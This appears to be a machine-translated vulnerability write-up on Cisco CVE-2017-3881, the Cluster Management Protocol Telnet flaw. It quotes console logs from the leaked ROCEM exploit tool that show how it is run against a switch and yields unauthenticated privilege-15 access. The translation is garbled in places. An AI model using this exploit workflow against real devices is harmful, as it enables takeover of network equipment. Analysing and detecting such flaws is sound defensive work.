2017 3 December 17, Cisco official website announced that the Cisco IOS&IOS-XE Software Cluster Management Protocol(Cluster Management Protocol)the presence of a remote code execution vulnerability, CVE-2017-3881-in.
The vulnerability is Cisco in the study of the CIA leak of the documentβVault 7βin the process of discovery, an attacker can unauthorized remote restart of the affected device or unauthorized code execution. Caused by the vulnerability of the main reasons is because there is no limit CMP-specific Telnet can be used only inside the local cluster of communication between members, but can be used to connect any of the affected equipment, as well as for the deformation of the CMP-specific Telnet option to set the error handling. When using a Telnet connection to an affected device, an attacker can send a variation of CMP-specific Telnet options set to build with the device connected, using this method an attacker can remotely execute arbitrary code to completely control the device or makes the device reboot.
As of this writing, Cisco is also no fix for Cluster Management Protocol remote code execution vulnerability CVE-2017-3881γ
Vault 7 document discloses a remote code execution vulnerability testing process, the vulnerability does not use the source code but in the interactive mode or the Setup mode to start. Interactive mode via telnet to send the payload, and in the same telnet connection context immediately to the attacker with a command shell:
Started ROCEM interactive session - successful:
root@debian:/home/user1/ops/adverse/adverse-1r/rocem# ./ rocem_c3560-ipbase-mz.122-35.SE5.py -i 192.168.0.254
[+] Validating data/interactive. bin
[+] Validating data/set. bin
[+] Validating data/transfer. bin
[+] Validating data/unset. bin
Image: c3560-ipbase-mz. 122-35. SE5
Host: 192.168.0.254
Action: Interactive
Proceed? (y/n)y
Trying 127.0.0.1β¦
[] Attempting connection to host 192.168.0.254:23
Connected to 127.0.0.1.
Escape character is β^]β.
[+] Connection established
[] Starting the interactive session
User Access Verification
Password:
MLS-Sth#
MLS-Sth# show priv
The Current privilege level is 15
MLS-Sth#show users
Line User Host(s) Idle Location
USE setting mode, modify the switch memory for subsequent telnet unauthorized connection to do to prepare:
Test set/unset feature of ROCEM
The DUT is configured with the target configuration and network setup
The DUT is accessed by hopping through three flux nodes as per the CONOP
Reloaded the DUT to start with a clean device
From Adverse ICON machine, set ROCEM:
root@debian:/home/user1/ops/adverse/adverse-1r/rocem# ./ rocem_c3560-ipbase-mz.122-35.SE5.py -s 192.168.0.254
[+] Validating data/interactive. bin
[+] Validating data/set. bin
[+] Validating data/transfer. bin
[+] Validating data/unset. bin
Image: c3560-ipbase-mz. 122-35. SE5
Host: 192.168.0.254
Action: Set
Proceed? (y/n)y
[] Attempting connection to host 192.168.0.254:23
[+] Connection established
[] Sending Protocol Step 1
[*] Sending Protocol Step 2
[+] Done
root@debian:/home/user1/ops/adverse/adverse-1r/rocem#
Verified I could telnet and rx priv 15 without creds:
root@debian:/home/user1/ops/adverse/adverse-1r/rocem# telnet 192.168.0.254
Trying 192.168.0.254β¦
Connected to 192.168.0.254.
Escape character is β^]β.
MLS-Sth#
MLS-Sth#show priv
The Current privilege level is 15
MLS-Sth#
In the study of this vulnerability, we found one on our useful informationβtelnet debug output:
Note that the last line received CISCO_KITS of the option, the time to prove that this is an important string.
According to Ciscoβs current published case, a total of 318 products affected by this vulnerability, a detailed list of products please see Appendix,
Currently the following only two products are not affected by this vulnerability:
Running Cisco IOS Software, but not in the affected list of devices is not affected.
Running Cisco IOS XE Software but does not include a CMP Protocol subsystem of the product is not affected.
CVE-2017-3881 the detection method